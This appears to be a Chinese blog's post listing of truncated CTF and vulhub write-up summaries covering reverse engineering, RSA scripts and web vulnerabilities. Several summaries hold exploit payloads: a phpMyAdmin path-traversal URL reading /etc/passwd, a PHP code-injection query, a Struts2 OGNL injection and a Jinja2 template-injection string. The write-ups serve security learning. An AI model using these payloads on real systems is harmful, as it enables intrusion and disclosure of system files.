摘要: 1.根据题目,获取备份文件 利用disreach扫备份文件,找到index.php.bak,下载该备份文件 分析备份文件 这里涉及到一个知识点,在 PHP 的弱类型比较中,有两种比价符号——““、”=”。 其中==在比较时候是先将字符串类型转化为相同,再比较; 是先判断两种字符串的类型是否相等,再比 阅读全文
posted @ 2022-10-22 15:31 kubopiy 阅读(287) 评论(0) 推荐(0) 编辑
摘要: 拖进ida里面,s是32位的, **v3的意思是指针的指针,也就是指针所对应的函数,后面4个就是对应的参数 https://blog.csdn.net/weixin_43884935/article/details/104870414 存档看着头疼 阅读全文
posted @ 2022-10-06 20:57 kubopiy 阅读(32) 评论(0) 推荐(0) 编辑
摘要: 阅读全文
posted @ 2022-10-06 19:50 kubopiy 阅读(30) 评论(0) 推荐(0) 编辑
摘要: <p><img src="C:\Users\kubopiy\AppData\Roaming\Typora\typora-user-images\image-20220918154739535.png" referrerpolicy="no-referrer"></p><p>没加壳,拖进ida里面</ 阅读全文
posted @ 2022-10-06 11:45 kubopiy 阅读(10) 评论(0) 推荐(0) 编辑
摘要: 注意,strcat拼接时,是以小端序方式拼接的,0x……LL中的LL指的是long long类型,从右到左读字符。 from binascii import a2b_heximport gmpy2t1 = '4E44434C53'key = 'ADSFK' + a2b_hex(t1).decode( 阅读全文
posted @ 2022-08-14 17:21 kubopiy 阅读(58) 评论(0) 推荐(0) 编辑
摘要: http://your-ip:8080/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd 在sql里面执行 SELECT '<?=phpinfo()?>'; http://node4.buuoj.cn:26180/ 阅读全文
posted @ 2022-07-23 19:26 kubopiy 阅读(47) 评论(0) 推荐(0) 编辑
摘要: https://github.com/vulhub/vulhub/blob/master/struts2/s2-013/README.zh-cn.md link.action?a=%24%7b(%23_memberAccess%5b%22allowStaticMethodAccess%22%5d%3 阅读全文
posted @ 2022-07-23 18:21 kubopiy 阅读(30) 评论(0) 推荐(0) 编辑
摘要: http://node4.buuoj.cn:28677/index.php?s=/index/index/name/$%7B@phpinfo()%7D 阅读全文
posted @ 2022-07-23 17:19 kubopiy 阅读(102) 评论(0) 推荐(0) 编辑
摘要: 得到54289,说明SSTI漏洞存在 http://your-ip:8000/?name=%7B%25%20for%20c%20in%20%5B%5D.__class__.__base__.__subclasses__()%20%25%7D%0A%7B%25%20if%20c.__name__%20 阅读全文
posted @ 2022-07-23 17:12 kubopiy 阅读(180) 评论(0) 推荐(0) 编辑
摘要: 快来签到 文件过大无法打开,参考另一篇ida使用汇总 signin p和q相近,进行n分解 import gmpy2import binascii# 利用中国剩余定理求解同余方程,aList:余数,mList:模数def CRT(aList, mList): M = 1 for i in mList 阅读全文
posted @ 2022-07-15 14:43 kubopiy 阅读(51) 评论(0) 推荐(0) 编辑